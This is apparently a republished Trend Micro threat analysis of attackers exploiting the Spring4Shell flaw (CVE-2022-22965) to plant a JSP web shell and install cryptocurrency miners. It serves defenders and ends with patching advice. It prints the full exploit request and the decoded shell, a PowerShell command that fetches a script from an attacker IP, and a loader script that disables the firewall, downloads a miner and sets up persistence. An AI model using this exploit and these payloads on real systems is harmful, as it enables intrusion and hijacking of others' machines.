{"id":46270,"date":"2022-04-20T00:00:00","date_gmt":"2022-04-20T00:00:00","guid":{"rendered":"urn:uuid:153e5adb-6016-30f6-fa35-8506ff0c68b5"},"modified":"2022-04-20T00:00:00","modified_gmt":"2022-04-20T00:00:00","slug":"spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/","title":{"rendered":"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/d\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/spring4shell-641.png\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/d\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/spring4shell-641.png\" class=\"ff-og-image-inserted\"><\/div>\n<p>Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners.<\/p>\n<p>The following code is used to create the web shell:<\/p>\n<h5><b><u>GET \/?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&amp;class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&amp;class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&amp;class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP\/1.1<\/u><\/b><\/h5>\n<h5>Host: &lt;redacted&gt;:&lt;redacted&gt;<\/h5>\n<h5>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko\/20100101 Firefox\/83.0<\/h5>\n<h5>Accept: *\/*<\/h5>\n<h5>Accept-Language: en-US,en;q=0.5<\/h5>\n<h5>X: &lt;%<\/h5>\n<h5>Y: Runtime<\/h5>\n<h5>Z: %&gt;\/\/<\/h5>\n<h5>Accept-Encoding: gzip<\/h5>\n<h5>&nbsp;<\/h5>\n<p>The web shell\u2019s content is URL-encoded using the following code:<\/p>\n<h5>%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F<\/h5>\n<h5>+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-<\/h5>\n<h5>c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di<\/h5>\n<h5>&nbsp;<\/h5>\n<p>After decoding, the resulting payload is a Spring4Shell web shell:<\/p>\n<h5>%{x}i try {Runtime.getRuntime().exec(System.getProperty(&#8220;os.name&#8221;).contains(&#8220;ndo&#8221;) ? new String[]{&#8220;cmd.exe&#8221;, &#8220;\/c&#8221;, request.getParameter(&#8220;w&#8221;)} : new String[]{&#8220;\/bin\/sh&#8221;, &#8220;-c&#8221;,<\/h5>\n<h5>request.getParameter(&#8220;l&#8221;)});} catch (Exception e) {};out.print(&#8220;@pong&#8221;); %{z}I<\/h5>\n<h5>&nbsp;<\/h5>\n<p>Before executing the payload, the malicious actors first have to determine the operating system of the machine they are infecting. They do this using a string check to see if \u201cos.name\u201d contains the word \u201cndo\u201d. If it does, then the machine is identified as Windows-based, otherwise the machine is identified as Linux-based.<\/p>\n<p>Once the operating system is identified, the encoded payload is executed. The exploit uniform resource identifier (URI) containing the web shell path and parameters is shown in the following code:<\/p>\n<h5><span class=\"rte-red-text\">\/zbc0fb.jsp<\/span>?<span class=\"rte-red-text\">w<\/span>=powershell.exe+-NonI+-W+Hidden+-NoP+-Exec+Bypass+-Enc+&lt;base64 encoded content&gt; &amp;l=echo+&lt;base64 encoded content&gt;<\/h5>\n<h5>&nbsp;<\/h5>\n<p>The web shell is identified as zbc0fb.jsp, while the parameters w and l stand for, respectively, Windows and Linux payloads, which are Base64-encoded.<\/p>\n<p>PowerShell is then executed using the following parameters:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">NonI: Run noninteractive session.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">W: Hide WindowStyle.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">NoP: Prevent the PowerShell profile from loading.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Exec: Make bypassing the script execution policy in&nbsp;PowerShell possible.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enc: Implement the Base64-encoded command.<\/span><\/li>\n<\/ul>\n<p>For Windows payloads, the following PowerShell command fetches the script ldr.ps1 and executes it within memory without having to create it on-disk:<b><\/b><\/p>\n<h5>I.E.X. .(.N.e.w.-.O.b.j.e.c.t. .N.e.t&#8230;W.e.b.C.l.i.e.n.t.)&#8230;D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.&#8217;.h.t.t.p.:.\/.\/.1.9&#8230;.1.4.5&#8230;2.2.7&#8230;2.1.\/.l.d.r&#8230;p.s.1.?.b.0.f.8.9.5._.&lt;IP address of potentially vulnerable server .:.&lt;port&gt;._.h.t.t.p.&#8217;.).<\/h5>\n<h5>&nbsp;<\/h5>\n<p>The IP address and the port of the vulnerable server are also logged on the malicious actors\u2019 infrastructure.<\/p>\n<p>The following code shows ldr.ps1 and its execution flow \u2014 specifically, the redacted PowerShell script that downloads the cryptocurrency miner and executes it. (A similar PowerShell script was previously reported by <a href=\"https:\/\/thedfirreport.com\/2021\/06\/03\/weblogic-rce-leads-to-xmrig\/\">The DFIR Report<\/a>.)<\/p>\n<h5><b><i>$cc=&#8221;http:\/\/&lt;redacted&gt;&#8221;<\/i><\/b><\/h5>\n<h5>$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))<\/h5>\n<h5>$dst=&#8221;$env:AppData\\$sys.exe&#8221;<\/h5>\n<h5>\u202f<\/h5>\n<h5>netsh advfirewall set allprofiles state off<\/h5>\n<h5>\u202f<\/h5>\n<h5>Get-Process network0*, *kthreaddi], kthreaddi, sysrv, sysrv012, sysrv011, sysrv010, sysrv00* -ErrorAction SilentlyContinue | Stop-Process<\/h5>\n<h5>\u202f<\/h5>\n<h5>$list = netstat -ano | findstr TCP<\/h5>\n<h5>for ($i = 0; $i -lt $list.Length; $i++) {<\/h5>\n<h5>&nbsp;&nbsp;&nbsp; $k = [Text.RegularExpressions.Regex]::Split($list[$i].Trim(), &#8216;\\s+&#8217;)<\/h5>\n<h5>&nbsp;&nbsp;&nbsp; if ($k[2] -match &#8220;(:3333|:4444|:5555|:7777|:9000)$&#8221;) {<\/h5>\n<h5>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Stop-Process -id $k[4]<\/h5>\n<h5>&nbsp;&nbsp;&nbsp; }<\/h5>\n<h5>}<\/h5>\n<h5>\u202f<\/h5>\n<h5>if (!(Get-Process kthreaddk -ErrorAction SilentlyContinue)) {<\/h5>\n<h5>&nbsp;&nbsp;&nbsp; (New-Object Net.WebClient).DownloadFile(&#8220;$cc\/sys.exe&#8221;, &#8220;$dst&#8221;)<\/h5>\n<h5>&nbsp;&nbsp;&nbsp; Start-Process &#8220;$dst&#8221; -windowstyle hidden<\/h5>\n<h5>&nbsp;&nbsp;&nbsp; schtasks \/create \/F \/sc minute \/mo 1 \/tn &#8220;BrowserUpdate&#8221; \/tr &#8220;$dst&#8221;<\/h5>\n<h5>&nbsp;&nbsp;&nbsp; reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \/v Run \/d &#8220;$dst&#8221; \/t REG_SZ \/f<\/h5>\n<h5>}<\/h5>\n<h5>&nbsp;<\/h5>\n<p>The execution flow of the cryptocurrency miner involves the following steps:<\/p>\n<p>1.&nbsp;&nbsp;&nbsp; The firewall is turned off using the netsh utility.<\/p>\n<p>2.&nbsp;&nbsp;&nbsp; Other known cryptocurrency miners such as&nbsp; kthreaddi, sysrv, and sysrv012 are stopped or killed.<\/p>\n<p>3.&nbsp;&nbsp;&nbsp; Other running processes listening on ports 3333, 4444, 5555, 7777, and 9000 are stopped.<\/p>\n<p>4.&nbsp;&nbsp;&nbsp; If the process kthreaddk does not exist, the cryptocurrency miner downloads a binary, sys.exe, from 194[.]145[.]227[.]21 to C:\\Users\\&lt;user&gt;\\AppData\\Roaming\\&lt;random-6-to-12-letter-string&gt;.exe.<\/p>\n<p>5.&nbsp;&nbsp;&nbsp; The cryptocurrency miner then starts the process with a hidden window to avoid having the user observe visual hints of the process being executed.<\/p>\n<p>6.&nbsp;&nbsp;&nbsp; A scheduled task with the name \u201cBrowserUpdate\u201d is created later, running every minute. In addition, the Windows run key is modified to run the binary sys.exe.<\/p>\n<p>We are unable confirm if the exploitation attempts we analyzed for this blog entry were successful. It should be noted that we also observed Linux payloads where the script ldr.sh attempts to stop other running cryptocurrency miners to run its own payload.<\/p>\n<p>We highly encourage users of the Spring framework to update their software to <a href=\"https:\/\/spring.io\/blog\/2022\/03\/31\/spring-framework-rce-early-announcement\">5.3.18 and 5.2.20 or later<\/a> to prevent the exploitation of Spring4Shell (CVE-2022-22965) from occurring on their systems. More details on how Trend Micro technologies such as <a href=\"https:\/\/cloudone.trendmicro.com\/\">Trend Micro Cloud One\u2122<\/a> protect users from attacks using this vulnerability can be found in <a href=\"https:\/\/success.trendmicro.com\/dcx\/s\/solution\/000290730\">our security bulletin<\/a>.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/d\/spring4shell-exploited-to-deploy-cryptocurrency-miners.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Recently, we observed the Spring4Shell vulnerability \u2014 a remote code execution bug, assigned as CVE-2022-22965 \u2014 being actively exploited by malicious actors to deploy cryptocurrency miners. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":46271,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9555,9509],"class_list":["post-46270","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-04-20T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/d\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/spring4shell-641.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners\",\"datePublished\":\"2022-04-20T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/\"},\"wordCount\":1005,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/\",\"name\":\"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners.png\",\"datePublished\":\"2022-04-20T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners.png\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/","og_locale":"en_US","og_type":"article","og_title":"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-04-20T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/d\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/spring4shell-641.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners","datePublished":"2022-04-20T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/"},"wordCount":1005,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/","url":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/","name":"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners.png","datePublished":"2022-04-20T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/04\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners.png","width":641,"height":350},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH 